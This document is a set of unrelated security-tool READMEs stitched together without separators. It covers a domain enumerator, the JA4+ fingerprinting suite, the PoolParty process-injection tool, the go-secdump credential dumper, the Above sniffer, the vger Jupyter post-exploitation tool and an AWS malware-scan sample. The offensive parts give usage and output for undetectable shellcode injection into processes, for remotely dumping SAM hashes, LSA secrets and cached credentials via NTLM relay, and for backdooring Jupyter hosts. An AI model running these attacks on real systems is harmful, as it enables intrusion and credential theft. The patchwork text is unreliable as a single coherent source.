./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
<domain>
is the domain to be enumerated. It can be a subdomain as well.-- ports | -p
is a string speicification of the ports to be scanned. It can be one of the following-all
- Scan all ports (1-65535)none
- Skip port scanning (default)t<n>
- Scan top n ports (same as nmap
). i.e. t100
scans top 100 ports. Max value is 5000. If n is greater than 5000, it will be set to 5000.80
scans port 8080-100
scans ports 80 to 10080,443,8080
scans ports 80, 443 and 808080,443,8080-8090,t500
scans ports 80, 443, 8080 to 8090 and top 500 ports--dns | -d
is the address of the dns server. This should be a valid IPv4 address and can optionally contain the port number-a.b.c.d
- Use DNS server at a.b.c.d
on port 53a.b.c.d#n
- Use DNS server at a.b.c.d
on port e
--wordlist | -l
- Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.--rps | -r
- Number of requests to be made per second during bruteforce. The default value is 1024 req/s
. It is to be noted that, DNS queries are made in batches and next batch is made only after the previous one is completed. Since quries can be rate limited, increasing the value does not always guarantee faster results.--out | -o
- Path to the output file. The output will be saved in JSON format. The filename must end with .json
.Examples - ./domainim nmap.org --ports=all
- ./domainim google.com --ports=none --dns=8.8.8.8#53
- ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500
- ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --outfile=results.json
- ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1
The help menu can be accessed using ./domainim --help
or ./domainim -h
.
Usage:
domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
domainim (-h | --help)
Options:
-h, --help Show this screen.
-p, --ports Ports to scan. [default: `none`]
Can be `all`, `none`, `t<n>`, single value, range value, combination
-l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
-d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
-r, --rps DNS queries to be made per second [default: 1024 req/s]
-o, --out JSON file where the output will be saved. Filename must end with `.json`
Examples:
domainim domainim.com -p:t500 -l:wordlist.txt --dns:1.1.1.1#53 --out=results.json
domainim sub.domainim.com --ports=all --dns:8.8.8.8 -t:1500 -o:results.json
The JSON schema for the results is as follows-
[
{
"subdomain": string,
"data": [
"ipv4": string,
"vhosts": [string],
"reverse_dns": string,
"ports": [int]
]
}
]
Example json for nmap.org
can be found here.
Contributions are welcome. Feel free to open a pull request or an issue.
This project is still in its early stages. There are several limitations I am aware of.
The two engines I am using (I'm calling them engine because Sublist3r does so) currently have some sort of response limit. dnsdumpster.com">dnsdumpster can fetch upto 100 subdomains. crt.sh also randomizes the results in case of too many results. Another issue with crt.sh is the fact that it returns some SQL error sometimes. So for some domain, results can be different for different runs. I am planning to add more engines in the future (at least a brute force engine).
The port scanner has only ping response time + 750ms
timeout. This might lead to false negatives. Since, domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).
It might seem that the way vhostnames are printed, it just brings repeition on the table.
Printing as the following might've been better-
ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scannme.nmap.org, svn.nmap.org, www.nmap.org
โณ 45.33.49.119
โณ Reverse DNS: ack.nmap.org.
But previously while testing, I found cases where not all IPs are shared by same set of vhostnames. That is why I decided to keep it this way.
DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query. This is to not make the DNS server get all the queries at once but rather in a more natural way. For bruteforcing method, the value is between 0-1000ms by default but that can be changed using --rps | -t
flag.
One particular limitation that is bugging me is that the DNS resolver would not return all the IPs for a domain. So it is necessary to make multiple queries to get all (or most) of the IPs. But then again, it is not possible to know how many IPs are there for a domain. I still have to come up with a solution for this. Also, nim-ndns
doesn't support CNAME records. So, if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author for this.
For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing will resolve IPv4 for all possible subdomains. However, this will skip valid subdomains also (i.e. scanme.nmap.org
will be skipped even though it's not a wildcard value). I will add a --force-brute | -fb
flag later to force bruteforcing.
Similar thing is true for VHost enumeration for subdomain inputs. Since, urls that ends with given subdomains are returned, subdomains of similar domains are not considered. For example, scannme.nmap.org
will not be printed for ack.nmap.org
but something.ack.nmap.org
might be. I can search for all subdomains of nmap.org
but that defeats the purpose of having a subdomains as an input.
MIT License. See LICENSE for full text.
JA4+ is a suite of network Fingerprintingย methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.
Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
JA4T: TCP Fingerprinting (JA4T/TS/TScan)
To understand how to read JA4+ fingerprints, see Technical Details
This repo includes JA4+ Python, Rust, Zeek and C, as a Wireshark plugin.
JA4/JA4+ support is being added to:
GreyNoise
Hunt
Driftnet
DarkSail
Arkime
GoLang (JA4X)
Suricata
Wireshark
Zeek
nzyme
Netresec's CapLoader
NetworkMiner">Netresec's NetworkMiner
NGINX
F5 BIG-IP
nfdump
ntop's ntopng
ntop's nDPI
Team Cymru
NetQuest
Censys
Exploit.org's Netryx
cloudflare.com/bots/concepts/ja3-ja4-fingerprint/">Cloudflare
fastly
with more to be announced...
Application | JA4+ Fingerprints |
---|---|
Chrome |
JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP) JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC) JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key) JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key) |
IcedID Malware Dropper | JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982 |
IcedID Malware |
JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8 JA4S=t120300_c030_5e2616a54c73
|
Sliver Malware |
JA4=t13d190900_9dc949149365_97f8aa674fd9 JA4S=t130200_1301_a56c5b993250 JA4X=000000000000_4f24da86fad6_bf0f0589fc03 JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
|
Cobalt Strike |
JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd JA4X=2166164053c1_2166164053c1_30d204a01551
|
SoftEther VPN |
JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client) JA4S=t130200_1302_a56c5b993250 JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
|
Qakbot | JA4X=2bab15409345_af684594efb4_000000000000 |
Pikabot | JA4X=1a59268f55e5_1a59268f55e5_795797892f9c |
Darkgate | JA4H=po10nn060000_cdb958d032b0 |
LummaC2 | JA4H=po11nn050000_d253db9d024b |
Evilginx | JA4=t13d191000_9dc949149365_e7c285222651 |
Reverse SSH Shell | JA4SSH=c76s76_c71s59_c0s70 |
Windows 10 | JA4T=64240_2-1-3-1-1-4_1460_8 |
Epson Printer | JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16 |
For more, see ja4plus-mapping.csv
The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.
Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark
Download the latest JA4 binaries from: Releases.
sudo apt install tshark
./ja4 [options] [pcap]
1) Install Wireshark https://www.wireshark.org/download.html which will install tshark 2) Add tshark to $PATH
ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
./ja4 [options] [pcap]
1) Install Wireshark for Windows from https://www.wireshark.org/download.html which will install tshark.exe
tshark.exe is at the location where wireshark is installed, for example: C:\Program Files\Wireshark\thsark.exe
2) Add the location of tshark to your "PATH" environment variable in Windows.
(System properties > Environment Variables... > Edit Path)
3) Open cmd, navigate the ja4 folder
ja4 [options] [pcap]
An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.
In the meantime, see ja4plus-mapping.csv
Feel free to do a pull request with any JA4+ data you find.
JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.
All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.
For example; GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints but with JA4, only the b part of the JA4 fingerprint changes, parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).
Current methods and implementation details:
| Full Name | Short Name | Description | |---|---|---| | JA4 | JA4 | TLS Client Fingerprinting
| JA4Server | JA4S | TLS Server Response / Session Fingerprinting | JA4HTTP | JA4H | HTTP Client Fingerprinting | JA4Latency | JA4L | Latency Measurment / Light Distance | JA4X509 | JA4X | X509 TLS Certificate Fingerprinting | JA4SSH | JA4SSH | SSH Traffic Fingerprinting | JA4TCP | JA4T | TCP Client Fingerprinting | JA4TCPServer | JA4TS | TCP Server Response Fingerprinting | JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner
The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...
To understand how to read JA4+ fingerprints, see Technical Details
JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.
JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.
All JA4+ methods are patent pending.
JA4+ is a trademark of FoxIO
JA4+ can and is being implemented into open source tools, see the License FAQ for details.
This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.
ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.
Q: Why are you sorting the ciphers? Doesn't the ordering matter?
A: It does but in our research we've found that applications and libraries choose a unique cipher list more than unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.
Q: Why are you sorting the extensions?
A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.
So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.
Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions and even though TLS1.3 only supports a few ciphers, browsers and applications still support many more.
John Althouse, with feedback from:
Josh Atkins
Jeff Atkinson
Joshua Alexander
W.
Joe Martin
Ben Higgins
Andrew Morris
Chris Ueland
Ben Schofield
Matthias Vallentin
Valeriy Vorotyntsev
Timothy Noel
Gary Lipsky
And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.
Contact John Althouse at john@foxio.io for licensing and questions.
Copyright (c) 2024, FoxIO
A collection of fully-undetectable process injection techniques abusing Windows Thread Pools. Presented at Black Hat EU 2023 Briefings under the title - injection-techniques-using-windows-thread-pools-35446">The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools
Variant ID | Varient Description |
---|---|
1 | Overwrite the start routine of the target worker factory |
2 | Insert TP_WORK work item to the target process's thread pool |
3 | Insert TP_WAIT work item to the target process's thread pool |
4 | Insert TP_IO work item to the target process's thread pool |
5 | Insert TP_ALPC work item to the target process's thread pool |
6 | Insert TP_JOB work item to the target process's thread pool |
7 | Insert TP_DIRECT work item to the target process's thread pool |
8 | Insert TP_TIMER work item to the target process's thread pool |
PoolParty.exe -V <VARIANT ID> -P <TARGET PID>
Insert TP_TIMER work item to process ID 1234
>> PoolParty.exe -V 8 -P 1234
[info] Starting PoolParty attack against process id: 1234
[info] Retrieved handle to the target process: 00000000000000B8
[info] Hijacked worker factory handle from the target process: 0000000000000058
[info] Hijacked timer queue handle from the target process: 0000000000000054
[info] Allocated shellcode memory in the target process: 00000281DBEF0000
[info] Written shellcode to the target process
[info] Retrieved target worker factory basic information
[info] Created TP_TIMER structure associated with the shellcode
[info] Allocated TP_TIMER memory in the target process: 00000281DBF00000
[info] Written the specially crafted TP_TIMER structure to the target process
[info] Modified the target process's TP_POOL tiemr queue list entry to point to the specially crafted TP_TIMER
[info] Set the timer queue to expire to trigger the dequeueing TppTimerQueueExp iration
[info] PoolParty attack completed successfully
The default shellcode spawns a calculator via the WinExec API.
To customize the executable to execute, change the path in the end of the g_Shellcode
variable present in the main.cpp file.
Package go-secdump is a tool built to remotely extract hashes from the SAM registry hive as well as LSA secrets and cached hashes from the SECURITY hive without any remote agent and without touching disk.
The tool is built on top of the library go-smb and use it to communicate with the Windows Remote Registry to retrieve registry keys directly from memory.
It was built as a learning experience and as a proof of concept that it should be possible to remotely retrieve the NT Hashes from the SAM hive and the LSA secrets as well as domain cached credentials without having to first save the registry hives to disk and then parse them locally.
The main problem to overcome was that the SAM and SECURITY hives are only readable by NT AUTHORITY\SYSTEM. However, I noticed that the local group administrators had the WriteDACL permission on the registry hives and could thus be used to temporarily grant read access to itself to retrieve the secrets and then restore the original permissions.
Much of the code in this project is inspired/taken from Impacket's secdump but converted to access the Windows registry remotely and to only access the required registry keys.
Some of the other sources that have been useful to understanding the registry structure and encryption methods are listed below:
https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
http://www.beginningtoseethelight.org/ntsecurity/index.htm
https://social.technet.microsoft.com/Forums/en-US/6e3c4486-f3a1-4d4e-9f5c-bdacdb245cfd/how-are-ntlm-hashes-stored-under-the-v-key-in-the-sam?forum=win10itprogeneral
Usage: ./go-secdump [options]
options:
--host <target> Hostname or ip address of remote server
-P, --port <port> SMB Port (default 445)
-d, --domain <domain> Domain name to use for login
-u, --user <username> Username
-p, --pass <pass> Password
-n, --no-pass Disable password prompt and send no credentials
--hash <NT Hash> Hex encoded NT Hash for user password
--local Authenticate as a local user instead of domain user
--dump Saves the SAM and SECURITY hives to disk and
transfers them to the local machine.
--sam Extract secrets from the SAM hive explicitly. Only other explicit targets are included.
--lsa Extract LSA secrets explicitly. Only other explicit targets are included.
--dcc2 Extract DCC2 caches explicitly. Only ohter explicit targets are included.
--backup-dacl Save original DACLs to disk before modification
--restore-dacl Restore DACLs using disk backup. Could be useful if automated restore fails.
--backup-file Filename for DACL backup (default dacl.backup)
--relay Start an SMB listener that will relay incoming
NTLM authentications to the remote server and
use that connection. NOTE that this forces SMB 2.1
without encryption.
--relay-port <port> Listening port for relay (default 445)
--socks-host <target> Establish connection via a SOCKS5 proxy server
--socks-port <port> SOCKS5 proxy port (default 1080)
-t, --timeout Dial timeout in seconds (default 5)
--noenc Disable smb encryption
--smb2 Force smb 2.1
--debug Enable debug logging
--verbose Enable verbose logging
-o, --output Filename for writing results (default is stdout). Will append to file if it exists.
-v, --version Show version
go-secdump will automatically try to modify and then restore the DACLs of the required registry keys. However, if something goes wrong during the restoration part such as a network disconnect or other interrupt, the remote registry will be left with the modified DACLs.
Using the --backup-dacl
argument it is possible to store a serialized copy of the original DACLs before modification. If a connectivity problem occurs, the DACLs can later be restored from file using the --restore-dacl
argument.
Dump all registry secrets
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local
or
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2
Dump only SAM, LSA, or DCC2 cache secrets
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --lsa
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --dcc2
Dump registry secrets using NTLM relaying
Start listener
./go-secdump --host 192.168.0.100 -n --relay
Trigger an auth to your machine from a client with administrative access to 192.168.0.100 somehow and then wait for the dumped secrets.
YYYY/MM/DD HH:MM:SS smb [Notice] Client connected from 192.168.0.30:49805
YYYY/MM/DD HH:MM:SS smb [Notice] Client (192.168.0.30:49805) successfully authenticated as (domain.local\Administrator) against (192.168.0.100:445)!
Net-NTLMv2 Hash: Administrator::domain.local:34f4533b697afc39:b4dcafebabedd12deadbeeffef1cea36:010100000deadbeef59d13adc22dda0
2023/12/13 14:47:28 [Notice] [+] Signing is NOT required
2023/12/13 14:47:28 [Notice] [+] Login successful as domain.local\Administrator
[*] Dumping local SAM hashes
Name: Administrator
RID: 500
NT: 2727D7906A776A77B34D0430EAACD2C5
Name: Guest
RID: 501
NT: <empty>
Name: DefaultAccount
RID: 503
NT: <empty>
Name: WDAGUtilityAccount
RID: 504
NT: <empty>
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: 0x15deadbeef645e75b38a50a52bdb67b4
$MACHINE.ACC:plain_password_hex:47331e26f48208a7807cafeababe267261f79fdc 38c740b3bdeadbeef7277d696bcafebabea62bb5247ac63be764401adeadbeef4563cafebabe43692deadbeef03f...
[*] DPAPI_SYSTEM
dpapi_machinekey: 0x8afa12897d53deadbeefbd82593f6df04de9c100
dpapi_userkey: 0x706e1cdea9a8a58cafebabe4a34e23bc5efa8939
[*] NL$KM
NL$KM: 0x53aa4b3d0deadbeef42f01ef138c6a74
[*] Dumping cached domain credentials (domain/username:hash)
DOMAIN.LOCAL/Administrator:$DCC2$10240#Administrator#97070d085deadbeef22cafebabedd1ab
...
Dump secrets using an upstream SOCKS5 proxy either for pivoting or to take advantage of Impacket's ntlmrelayx.py SOCKS server functionality.
When using ntlmrelayx.py as the upstream proxy, the provided username must match that of the authenticated client, but the password can be empty.
./ntlmrelayx.py -socks -t 192.168.0.100 -smb2support --no-http-server --no-wcf-server --no-raw-server
...
./go-secdump --host 192.168.0.100 --user Administrator -n --socks-host 127.0.0.1 --socks-port 1080
Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.
Above: Invisible network protocol sniffer
Designed for pentesters and security engineers
Author: Magama Bazarov, <caster@exploit.org>
Pseudonym: Caster
Version: 2.6
Codename: Introvert
All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.
It is a specialized network security tool that helps both pentesters and security professionals.
Above is a invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. He's invisible. Completely based on the Scapy library.
Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.
Detects up to 27 protocols:
MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Passive ARP, Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
802.1Q Tags (VLAN)
S7COMM (Siemens)
OMRON
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Host Standby Redundancy Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)
Above works in two modes:
The tool is very simple in its operation and is driven by arguments:
.pcap
as input and looks for protocols in it.pcap
file, its name you specify yourselfusage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]
options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
--output OUTPUT File name where the traffic will be recorded
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)
The information obtained will be useful not only to the pentester, but also to the security engineer, he will know what he needs to pay attention to.
When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:
Impact: What kind of attack can be performed on this protocol;
Tools: What tool can be used to launch an attack;
Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.
Mitigation: Recommendations for fixing the security problems
Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses
You can install Above directly from the Kali Linux repositories
caster@kali:~$ sudo apt update && sudo apt install above
Or...
caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
caster@kali:~$ git clone https://github.com/casterbyte/Above
caster@kali:~$ cd Above/
caster@kali:~/Above$ sudo python3 setup.py install
# Install python3 first
brew install python3
# Then install required dependencies
sudo pip3 install scapy colorama setuptools
# Clone the repo
git clone https://github.com/casterbyte/Above
cd Above/
sudo python3 setup.py install
Don't forget to deactivate your firewall on macOS!
Above requires root access for sniffing
Above can be run with or without a timer:
caster@kali:~$ sudo above --interface eth0 --timer 120
To stop traffic sniffing, press CTRL + ะก
WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. Tool on tunneled L3 interfaces may not work properly.
Example:
caster@kali:~$ sudo above --interface eth0 --timer 120
-----------------------------------------------------------------------------------------
[+] Start sniffing...
[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SSDP Packet
[*] Attack Impact: Potential for UPnP Device Exploitation
[*] Tools: evil-ssdp
[*] SSDP Source IP: 192.168.0.251
[*] SSDP Source MAC: 02:10:de:64:f2:34
[*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
--------------------------------------------------
[+] Detected MDNS Packet
[*] Attack Impact: MDNS Spoofing, Credentials Interception
[*] Tools: Responder
[*] MDNS Spoofing works specifically against Windows machines
[*] You cannot get NetNTLMv2-SSP from Apple devices
[*] MDNS Speaker IP: fe80::183f:301c:27bd:543
[*] MDNS Speaker MAC: 02:10:de:64:f2:34
[*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
--------------------------------------------------
If you need to record the sniffed traffic, use the --output
argument
caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap
If you interrupt the tool with CTRL+C, the traffic is still written to the file
If you already have some recorded traffic, you can use the --input
argument to look for potential security issues
caster@kali:~$ above --input ospf-md5.cap
Example:
caster@kali:~$ sudo above --input ospf-md5.cap
[+] Analyzing pcap file...
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 10.0.0.1
[*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 192.168.0.2
[*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
The tool can detect hosts without noise in the air by processing ARP frames in passive mode
caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10
[+] Host discovery using Passive ARP
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.88
[*] MAC Address: 00:00:0c:07:ac:c8
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.40
[*] MAC Address: 00:0c:29:c5:82:81
--------------------------------------------------
I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.
V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.
pip install vger
vger --help
Currently, vger interactive
has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by-name in non-interactive format with vger <module>
. List available modules with vger --help
.
Once a connection is established, users drop into a nested set of menus.
The top level menu is: - Reset: Configure a different host. - Enumerate: Utilities to learn more about the host. - Exploit: Utilities to perform direct action and manipulation of the host and artifacts. - Persist: Utilities to establish persistence mechanisms. - Export: Save output to a text file. - Quit: No one likes quitters.
These menus contain the following functionality: - List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code. - Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py
file. Either input is processed as a string and executed in runtime of the notebook. - Backdoor: Launch a new JupyterLab instance open to 0.0.0.0
, with allow-root
on a user-specified port
with a user-specified password
. - Check History: See ipython commands recently run in the target notebook. - Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal. - List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /
. - Upload file: Upload file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension. - Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory). - Find models: Find models based on common file formats. - Download models: Download discovered models. - Snoop: Monitor notebook execution and results until timeout. - Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.
With pip install vger[ai]
you'll get LLM generated summaries of notebooks in the target environment. These are meant to be rough translation for non-DS/AI folks to do quick triage of if (or which) notebooks are worth investigating further.
There was an inherent tradeoff on model size vs. ability and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").
It can be difficult for security teams to continuously monitor all on-premises servers due to budget and resource constraints. Signature-based antivirus alone is insufficient as modern malware uses various obfuscation techniques. Server admins may lack visibility into security events across all servers historically. Determining compromised systems and safe backups to restore from during incidents is challenging without centralized monitoring and alerting. It is onerous for server admins to setup and maintain additional security tools for advanced threat detection. The rapid mean time to detect and remediate infections is critical but difficult to achieve without the right automated solution.
Determining which backup image is safe to restore from during incidents without comprehensive threat intelligence is another hard problem. Even if backups are available, without knowing when exactly a system got compromised, it is risky to blindly restore from backups. This increases the chance of restoring malware and losing even more valuable data and systems during incident response. There is a need for an automated solution that can pinpoint the timeline of infiltration and recommend safe backups for restoration.
The solution leverages AWS Elastic Disaster Recovery (AWS DRS), Amazon GuardDuty and AWS Security Hub to address the challenges of malware detection for on-premises servers.
This combo of services provides a cost-effective way to continuously monitor on-premises servers for malware without impacting performance. It also helps determine safe recovery point in time backups for restoration by identifying timeline of compromises through centralized threat analytics.
AWS Elastic Disaster Recovery (AWS DRS) minimizes downtime and data loss with fast, reliable recovery of on-premises and cloud-based applications using affordable storage, minimal compute, and point-in-time recovery.
Amazon GuardDuty is a threat detection service that continuously monitors your AWS accounts and workloads for malicious activity and delivers detailed security findings for visibility and remediation.
AWS Security Hub is a cloud security posture management (CSPM) service that performs security best practice checks, aggregates alerts, and enables automated remediation.
The Malware Scan solution assumes on-premises servers are already being replicated with AWS DRS, and Amazon GuardDuty & AWS Security Hub are enabled. The cdk stack in this repository will only deploy the boxes labelled as DRS Malware Scan in the architecture diagram.
Amazon Security Hub enabled. If not, please check this documentation
Warning
Currently, Amazon GuardDuty Malware scan does not support EBS volumes encrypted with EBS-managed keys. If you want to use this solution to scan your on-prem (or other-cloud) servers replicated with DRS, you need to setup DRS replication with your own encryption key in KMS. If you are currently using EBS-managed keys with your replicating servers, you can change encryption settings to use your own KMS key in the DRS console.
Create a Cloud9 environment with Ubuntu image (at least t3.small for better performance) in your AWS account. Open your Cloud9 environment and clone the code in this repository. Note: Amazon Linux 2 has node v16 which is not longer supported since 2023-09-11 git clone https://github.com/aws-samples/drs-malware-scan
cd drs-malware-scan
sh check_loggroup.sh
Deploy the CDK stack by running the following command in the Cloud9 terminal and confirm the deployment
npm install
cdk bootstrap
cdk deploy --all
Note
The solution is made of 2 stacks: * DrsMalwareScanStack: it deploys all resources needed for malware scanning feature. This stack is mandatory. If you want to deploy only this stack you can run cdk deploy DrsMalwareScanStack
* ScanReportStack: it deploys the resources needed for reporting (Amazon Lambda and Amazon S3). This stack is optional. If you want to deploy only this stack you can run cdk deploy ScanReportStack
